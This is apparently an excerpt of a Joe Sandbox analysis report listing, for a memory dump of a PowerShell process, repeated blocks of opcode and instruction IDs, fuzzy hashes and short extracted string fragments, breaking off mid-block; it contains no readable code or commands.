• Instruction ID: 2903d32d05e91a7b53d9d02fd56efd8b97d4294c5ea9ee63096d806f97ee1ffb
• Opcode Fuzzy Hash: 086a3569fb8034f6e848b85e89b17e1108295cf311c50978ca64848d0b39ebf2
• Instruction Fuzzy Hash: 6F624FB4A002189FDB64DB68C955BDEBBB2FF84700F1080E9D5096B791CB75AE81CF91

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$(fwl$4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq
• API String ID: 0-875421214
• Opcode ID: 8e187a45542f6510dcd48bd797bc1b51eef7576b4404e76a251b0e208b6e713e
• Instruction ID: ac9f2734138521af529233bc94f7be96ba3db55e0ed0751178d224212d0f2e9a
• Opcode Fuzzy Hash: 8e187a45542f6510dcd48bd797bc1b51eef7576b4404e76a251b0e208b6e713e
• Instruction Fuzzy Hash: 9C12B1F5B00215DFEB25CB68C541AAABBF2FF89310F1480AAD9059B751DB32DC41DBA1

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl
• API String ID: 0-519931695
• Opcode ID: 7f21ac04f4f70cb9d5afb8c48a418dbc7f6052b549dffdc29f68fd0710d142ff
• Instruction ID: 59a01c80b0c151b2c136fd237d6977cc0c44bf77b33f4d2d55aff6d54ae70420
• Opcode Fuzzy Hash: 7f21ac04f4f70cb9d5afb8c48a418dbc7f6052b549dffdc29f68fd0710d142ff
• Instruction Fuzzy Hash: 89627AB4A00205DFDB24CB98C551AAABBB2FF88304F24C0A9D9099F755CB72ED45DF91

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$(fwl$4'fq$4'fq$x.hk$x.hk$-hk
• API String ID: 0-1521981089
• Opcode ID: 5672619bda13c67fc685b58fdd34a27ae9951959c659ee027b2f0a18618eb2a3
• Instruction ID: a86948576f141778974c4366f14c52d3e2ee4bdbc2e5ac6c1a6d1e9447a385b4
• Opcode Fuzzy Hash: 5672619bda13c67fc685b58fdd34a27ae9951959c659ee027b2f0a18618eb2a3
• Instruction Fuzzy Hash: 0CF1A5F0A002159FDB24DB68C951F9ABBB3EF84304F10C499D509AF795CB71AD858FA1

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$4'fq$4'fq$4'fq$x.hk$-hk
• API String ID: 0-2143175891
• Opcode ID: 5f4f639f044533dea0f1b2924033df98f7b3ae702fb6ec5b9bee90d70d2dbe5d
• Instruction ID: 9af9a126668a554a1a9de002e2d66ccc6a7beebad2afaa61fa087c35fbcfe74a
• Opcode Fuzzy Hash: 5f4f639f044533dea0f1b2924033df98f7b3ae702fb6ec5b9bee90d70d2dbe5d
• Instruction Fuzzy Hash: 0C02C0F0A002049FDB24DF58C951B9ABBB2EF85314F15C499E509AF351CB71EC86CBA1

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$(fwl$4'fq$4'fq$x.hk$x.hk
• API String ID: 0-792651079
• Opcode ID: f75b36b58848796da7a753d58cc55cf303d3085921f884e2636ec91779d3354a
• Instruction ID: 4aaee69ae9bac031285ee79ab1633856c446845f279630e64a0919a458a2a59b
• Opcode Fuzzy Hash: f75b36b58848796da7a753d58cc55cf303d3085921f884e2636ec91779d3354a
• Instruction Fuzzy Hash: 39023DB4A00259DFDB64DB68C954BEDBBB2FB44700F1080E5D909AB741CB71AE81DFA1

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$4'fq$4'fq$x.hk$x.hk$-hk
• API String ID: 0-3310609394
• Opcode ID: 25e0d64672a55c0e3f5794bed03b19e2fece79759202ae978781d9e67396e1c7
• Instruction ID: c074d3083f23df95a61066c091662c8bb2a725c6ae6c9cf3e5a3ba60ed6b8c8d
• Opcode Fuzzy Hash: 25e0d64672a55c0e3f5794bed03b19e2fece79759202ae978781d9e67396e1c7
• Instruction Fuzzy Hash: 6CE161B4A002189FDB24DB68C955B9EBBE2FF84700F1084D9D6099F795CB71ED818FA1

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$$fq$$fq$$fq$$fq
• API String ID: 0-1793556278
• Opcode ID: 115169db2225ba236f4891367588808277f11e58ea6804aa6b096c8b46664304
• Instruction ID: 0de1e8013523a41a46312bcbf5461a3ed7a2be27b5fd56e76a8cb5422d32d8ac
• Opcode Fuzzy Hash: 115169db2225ba236f4891367588808277f11e58ea6804aa6b096c8b46664304
• Instruction Fuzzy Hash: 10B13EF2B04216DFEB14AB68D94567BBBA6EFC1310F1480EED605CB651DB31C841DBA2

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$4'fq$x.hk$-hk
• API String ID: 0-3764169586
• Opcode ID: 3efc7a49256d4886275f44b11d84093d341662f2d32b5382cb23d1d87f42642e
• Instruction ID: eea4bb08d4ad9f5e300e67c5295cf5a3a61c42efe5b028deca0224396b2ab9fa
• Opcode Fuzzy Hash: 3efc7a49256d4886275f44b11d84093d341662f2d32b5382cb23d1d87f42642e
• Instruction Fuzzy Hash: 02A19AF0A002059FDB28DF98C540B9EBBB2EF88314F14C499E9046F755CB76E845DBA1

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$$fq$$fq$$fq
• API String ID: 0-3759051638
• Opcode ID: 59c742a593b19217745e056d8af2e79ce6bc9dc5013259cdab9f765d1452e6da
• Instruction ID: a568a638c52f05bf5aabfb4342509b85e925b05c3d6153bf8e53c121ffdecd1d
• Opcode Fuzzy Hash: 59c742a593b19217745e056d8af2e79ce6bc9dc5013259cdab9f765d1452e6da
• Instruction Fuzzy Hash: 076108F1605345DFEF258B68C8517E67BB5FF86350F18C0EAE8048B292DA35D841E761

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$(fwl$(fwl
• API String ID: 0-2374567490
• Opcode ID: 28e34d837bdca9a81f40f284ce42b09a1ba7c43d7d73a706d31dadf7575eccdd
• Instruction ID: a59962c96022ef29e2eaea72a6df6f633f6da22c5124f777b9b25da73d37354a
• Opcode Fuzzy Hash: 28e34d837bdca9a81f40f284ce42b09a1ba7c43d7d73a706d31dadf7575eccdd
• Instruction Fuzzy Hash: 203248B4A00205DFEB24CB98C541A99BBB2FF88314F15C0A9E9099F759CB72ED45CF91

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$(fwl$(fwl
• API String ID: 0-2374567490
• Opcode ID: 2a88271dea92151451b595848e487dbf29583d25bbf55f6a674baac528b97838
• Instruction ID: 3571eba94ff48893741475024ff1f0cc59dba9a369d6ab70d756cae92df12aed
• Opcode Fuzzy Hash: 2a88271dea92151451b595848e487dbf29583d25bbf55f6a674baac528b97838
• Instruction Fuzzy Hash: 801246B4A00205EFEB24CB98C540AA9BBB2FF88304F15C0A9E9099F755CB72ED55DF51

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$(fwl$x.hk
• API String ID: 0-1798524581
• Opcode ID: 3710fc5fba9db8378f607fe9a2142e460e3510e9c518a3f4f1befc274267ed4e
• Instruction ID: 74801463e60b5e125d0908b6a5869282cae1f4a3a18d6d2457c843ed11621904
• Opcode Fuzzy Hash: 3710fc5fba9db8378f607fe9a2142e460e3510e9c518a3f4f1befc274267ed4e
• Instruction Fuzzy Hash: FCA1A1F4A00245EFEB24DB98C645B9AB7F2FF88310F1480A9E9056B755CB71EC50DBA4

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: 84ul$tPfq
• API String ID: 0-453248634
• Opcode ID: 129d6e71c09bb9e9b6f9f51ddda2d6af401e5febb741750b314f76079537e99e
• Instruction ID: 8aeeb09f0e49b4648ece6a1fde9e8edf6b5a53a728a2c6f717454b7f397984b8
• Opcode Fuzzy Hash: 129d6e71c09bb9e9b6f9f51ddda2d6af401e5febb741750b314f76079537e99e
• Instruction Fuzzy Hash: 2351F0B1A093859FE7128B688855B66BFF1EF86214F1DC0DAD4449F293C7319C46C792

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: $fq$$fq
• API String ID: 0-2537786760
• Opcode ID: bce08ecd6b82dfaf6bce2e6befdf2ee4285adf8286f72651cc9a0eb9b2e876b8
• Instruction ID: 4e5e3559bc8e03e562036c8618721493482d1669afe8d04fd6cbf1897f209657
• Opcode Fuzzy Hash: bce08ecd6b82dfaf6bce2e6befdf2ee4285adf8286f72651cc9a0eb9b2e876b8
• Instruction Fuzzy Hash: ED11E7F6309246EFEB11AE14D840D62BB75EFC2250B1980DBD645CB152D732C801EB61

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: $fq
• API String ID: 0-12477121
• Opcode ID: feda33f1326c1ad83d88ef5500b5ba14e53d3b797d5e5b3bf9e23477393814ea
• Instruction ID: 02f38951b09380252f34c322970f35b6f9aa843a27004c780a322b5660018a5d
• Opcode Fuzzy Hash: feda33f1326c1ad83d88ef5500b5ba14e53d3b797d5e5b3bf9e23477393814ea
• Instruction Fuzzy Hash: 048159F27043459FEB156A78C85026BBBB5EFC2210F1884EBD644CB652CA35D881DBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl
                                                                                                    • API String ID: 0-753020189
                                                                                                    • Opcode ID: db3e08b1dd510bef3a455aa2efdf3ac5ea8b1ec23f53ac8896727cf669aa25a4
                                                                                                    • Instruction ID: 9dfd07df2849abdcaef873cc3e639925325ab42031c9dca18f596735a8d23c44
                                                                                                    • Opcode Fuzzy Hash: db3e08b1dd510bef3a455aa2efdf3ac5ea8b1ec23f53ac8896727cf669aa25a4
                                                                                                    • Instruction Fuzzy Hash: 7E8148F5A00205DFEB14CF58C585A99BBB2FF88324F1580A9E905AB355CB32ED41DFA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl
                                                                                                    • API String ID: 0-753020189
                                                                                                    • Opcode ID: 5611588f8d90b28136682d1f0413368d42209a36daacf20773d8fb4209ff5e37
                                                                                                    • Instruction ID: 8b5591e4df3a80abb4d3a3071513bdc88851399caeb39ab72d990f3e04539739
                                                                                                    • Opcode Fuzzy Hash: 5611588f8d90b28136682d1f0413368d42209a36daacf20773d8fb4209ff5e37
                                                                                                    • Instruction Fuzzy Hash: CB8126F4A00205DFEB14CF58C585A99BBB2FF88324F1580A9E905AB755CB32ED41DF61
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x.hk
                                                                                                    • API String ID: 0-3394790906
                                                                                                    • Opcode ID: 4fb887fbef47533491f8849a86e4d119dc1059b92a30fa7c00bdf0cfc097f0c6
                                                                                                    • Instruction ID: adf043ff5d9fb853a64ba0d3639c36abc77b3c3d7fa7a59303b4585a5c8ba4c3
                                                                                                    • Opcode Fuzzy Hash: 4fb887fbef47533491f8849a86e4d119dc1059b92a30fa7c00bdf0cfc097f0c6
                                                                                                    • Instruction Fuzzy Hash: 3631A7B4B401049FDB14ABA8C955BAF7AB3EF84310F148468EA016F791CF75AC458BE1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq
                                                                                                    • API String ID: 0-2007657732
                                                                                                    • Opcode ID: 3955bb49093dda887c45faac1e3a70bf727946a80bfa53090e46e0cb5b102b1d
                                                                                                    • Instruction ID: 404307924de076e1ebc7d933d602a592e77ad4a9d3e6d3f43b679fb83c9e35e3
                                                                                                    • Opcode Fuzzy Hash: 3955bb49093dda887c45faac1e3a70bf727946a80bfa53090e46e0cb5b102b1d
                                                                                                    • Instruction Fuzzy Hash: 4531E5F1A402129FEF245A7445017797AB2FF81740F2840EDD901DF291EB35C941EBA6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2db7bf3dc16e7de9bfa006a3f3ee53fb74fd9b61f0eb9f169d63ee88b82ab4f6
                                                                                                    • Instruction ID: 93be35e2c99a81fb4255d74a6d03a78aa23050ae071b02e9894d350ed6005e4b
                                                                                                    • Opcode Fuzzy Hash: 2db7bf3dc16e7de9bfa006a3f3ee53fb74fd9b61f0eb9f169d63ee88b82ab4f6
                                                                                                    • Instruction Fuzzy Hash: 78F02BF1600616EFD3185E1894C0567B7EAFF85398734C96DD45417A40C731BCC1DB94
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$84ul$84ul$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-382920908
                                                                                                    • Opcode ID: 01892aa4580fe49ee2e991603a32aebcf72f0b5a3097a349720220f4f13bf663
                                                                                                    • Instruction ID: eee41edd4c2c61bc26d2c03cdd91b086f695255826f66abd08e548763bbda3b7
                                                                                                    • Opcode Fuzzy Hash: 01892aa4580fe49ee2e991603a32aebcf72f0b5a3097a349720220f4f13bf663
                                                                                                    • Instruction Fuzzy Hash: ADF10AF1B04219DFEB258F69C44467BBBA6FF85310F14C0EAD5198B251DB31D881EBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$84ul$84ul$84ul$84ul$tPfq$tPfq$tPfq$tPfq$$fq$(lq$(lq$(lq$(lq
                                                                                                    • API String ID: 0-430768251
                                                                                                    • Opcode ID: 201ec5f7ca6299088120a41ed8c0ca5cb3d0eae437486f789f344ab793516708
                                                                                                    • Instruction ID: c10b22354882852f05a76b53e7c5c457ef8fcab76f9ffb4324b6d6ed499f77de
                                                                                                    • Opcode Fuzzy Hash: 201ec5f7ca6299088120a41ed8c0ca5cb3d0eae437486f789f344ab793516708
                                                                                                    • Instruction Fuzzy Hash: 87A1E7F17001199FEF24DFA8C94566BBBA2EB85710F1484D9E8019B291DB31FC41EBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Tgk$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$DUgk$XYwl$XYwl$$fq$$fq$$fq
                                                                                                    • API String ID: 0-2790179083
                                                                                                    • Opcode ID: 0e6c1539fe79cf185be8c1be9151520f5f1ab937feef5d94f5f0e02a838554af
                                                                                                    • Instruction ID: 8802c013af997eeb4174feecf341da2f3871a011fe2aeb81be1dc7bb5bf40464
                                                                                                    • Opcode Fuzzy Hash: 0e6c1539fe79cf185be8c1be9151520f5f1ab937feef5d94f5f0e02a838554af
                                                                                                    • Instruction Fuzzy Hash: 30E1F8F1B042098FEF259F68C4456AABBA2EF86310F14C0EAD655CF652DB31DC41DBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-1802041116
                                                                                                    • Opcode ID: 9caa200f7e6dcbc0785f7ce46c5e2a4c3e5078d94c0001e111d7cafcc67b8ecc
                                                                                                    • Instruction ID: 155a51cbf8ab78e0b26c5147bb673e64ac96478a70ce9708f811c8f30d62dbb0
                                                                                                    • Opcode Fuzzy Hash: 9caa200f7e6dcbc0785f7ce46c5e2a4c3e5078d94c0001e111d7cafcc67b8ecc
                                                                                                    • Instruction Fuzzy Hash: A2A127F17142169FEB258A7988516FA7BA6FF81250F1480FAF541CB291DF31C881F7A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3767066038
                                                                                                    • Opcode ID: 606fb653afca52078f7080f04a06f65be78a786253108377f70a51db77dcad68
                                                                                                    • Instruction ID: 1df34e98809f4a5504e19058d1e4e962e4910c693e9ef304ab4ff897d811ed65
                                                                                                    • Opcode Fuzzy Hash: 606fb653afca52078f7080f04a06f65be78a786253108377f70a51db77dcad68
                                                                                                    • Instruction Fuzzy Hash: 7FA12AF2F0021D9FEB249E6DC8416ABBBA3EF85310F14C0AAD5559B281DF31D981DB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$84ul$84ul$TQkq$TQkq$tPfq$tPfq$$fq$$fq
                                                                                                    • API String ID: 0-4096800185
                                                                                                    • Opcode ID: 0627c41b6dfe97ee7b52d05c8d2d8fded97fad0084483f9cfc5add4d872017a4
                                                                                                    • Instruction ID: 782778042f08744007d7cc18c412d6107770dd5199d85ef207db95f5bde47da4
                                                                                                    • Opcode Fuzzy Hash: 0627c41b6dfe97ee7b52d05c8d2d8fded97fad0084483f9cfc5add4d872017a4
                                                                                                    • Instruction Fuzzy Hash: 5E41C4F1A00209DFEB25DF58C8456AB77A6FB89710F1484D9E9416B384CB31EC41D7A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$4'fq$4'fq$4tl$4tl$tLik
                                                                                                    • API String ID: 0-350862496
                                                                                                    • Opcode ID: 739ca8968a14c2ad2ea627818928dc36b4a9ba9bbe80b86ab6079714f421285f
                                                                                                    • Instruction ID: 5a7711324200f94a16a247cd8de2dc228aa2c86fe46a99c93bfb4a145298e613
                                                                                                    • Opcode Fuzzy Hash: 739ca8968a14c2ad2ea627818928dc36b4a9ba9bbe80b86ab6079714f421285f
                                                                                                    • Instruction Fuzzy Hash: E961B3F0B00209DFDB24CBA8C451A6ABBE3EF88714F1484A9D6059B754CF31EC41DB92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-519931695
                                                                                                    • Opcode ID: a0d92e1272682df088362598f5d623f48d095eb5cf10ee8ffb664e0c1fc05efa
                                                                                                    • Instruction ID: c4e6505a2376a2a18710615fd74896fc3899230f971476cc7386ebcb524023e1
                                                                                                    • Opcode Fuzzy Hash: a0d92e1272682df088362598f5d623f48d095eb5cf10ee8ffb664e0c1fc05efa
                                                                                                    • Instruction Fuzzy Hash: 50C171F0E10209DFEF24DBA8C951A6ABBA2EF85714F14C4A9D8059B744DF31EC41DB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84ul$84ul$84ul$84ul$tPfq$tPfq$tPfq$tPfq
                                                                                                    • API String ID: 0-196553006
                                                                                                    • Opcode ID: 7b89ba1189554f4f1edb1a47363e4ea1082e95dd338ab0129257b09dcaeee094
                                                                                                    • Instruction ID: 7cb930e2c8d1299f6c2f5e05a62bd6ce206af9db52c238f7769af6275dfa3152
                                                                                                    • Opcode Fuzzy Hash: 7b89ba1189554f4f1edb1a47363e4ea1082e95dd338ab0129257b09dcaeee094
                                                                                                    • Instruction Fuzzy Hash: 8E91D6F1B002159FEB24DF68C445A6EBBE2FF89310F188899E9069B391CB31DD41DB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84ul$84ul$XRkq$XRkq$XRkq$tPfq$tPfq$$fq
                                                                                                    • API String ID: 0-2074613302
                                                                                                    • Opcode ID: 785ae6de1bfd12da66009315e14d231421d685103329cc1a5f9110eae3cffbc7
                                                                                                    • Instruction ID: 9d46a572b381358906bdd94caddab41c30681064564cfd26a6c7734dabf32950
                                                                                                    • Opcode Fuzzy Hash: 785ae6de1bfd12da66009315e14d231421d685103329cc1a5f9110eae3cffbc7
                                                                                                    • Instruction Fuzzy Hash: E9612AF1B401059FEB259FA885406AABBF2FF89710F24C0A9E9419F391CB35DC41DBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$4'fq$4'fq$x.hk$-hk
                                                                                                    • API String ID: 0-3495770889
                                                                                                    • Opcode ID: 8e26a3af981fe1050a89080e75784df034a17c0210168feefc7c949cfec85b5f
                                                                                                    • Instruction ID: bf0e193f115fdf8c0b35fddc8211d42e9e463c73844c9d3aff0815a6c0826759
                                                                                                    • Opcode Fuzzy Hash: 8e26a3af981fe1050a89080e75784df034a17c0210168feefc7c949cfec85b5f
                                                                                                    • Instruction Fuzzy Hash: 81C1B2F0B002059FEB24DFA4C554BAEBBF2FF84710F14849AD9016B784CB35AC469BA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$4'fq$4'fq$x.hk$-hk
                                                                                                    • API String ID: 0-3495770889
                                                                                                    • Opcode ID: 96781a7b7d1669d0d2a363e89c67ddbf3913adc823ecf5a116dfb6caf74b4e63
                                                                                                    • Instruction ID: e9b7780f8624a58572e3d0892e2c9409f1f84ba47d943d8ebfd3a1c784a5ae7d
                                                                                                    • Opcode Fuzzy Hash: 96781a7b7d1669d0d2a363e89c67ddbf3913adc823ecf5a116dfb6caf74b4e63
                                                                                                    • Instruction Fuzzy Hash: D8C1B1F0B00205DFEB24DF94C554BAEBBB2FF84710F148499EA056B744CB71AC469BA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
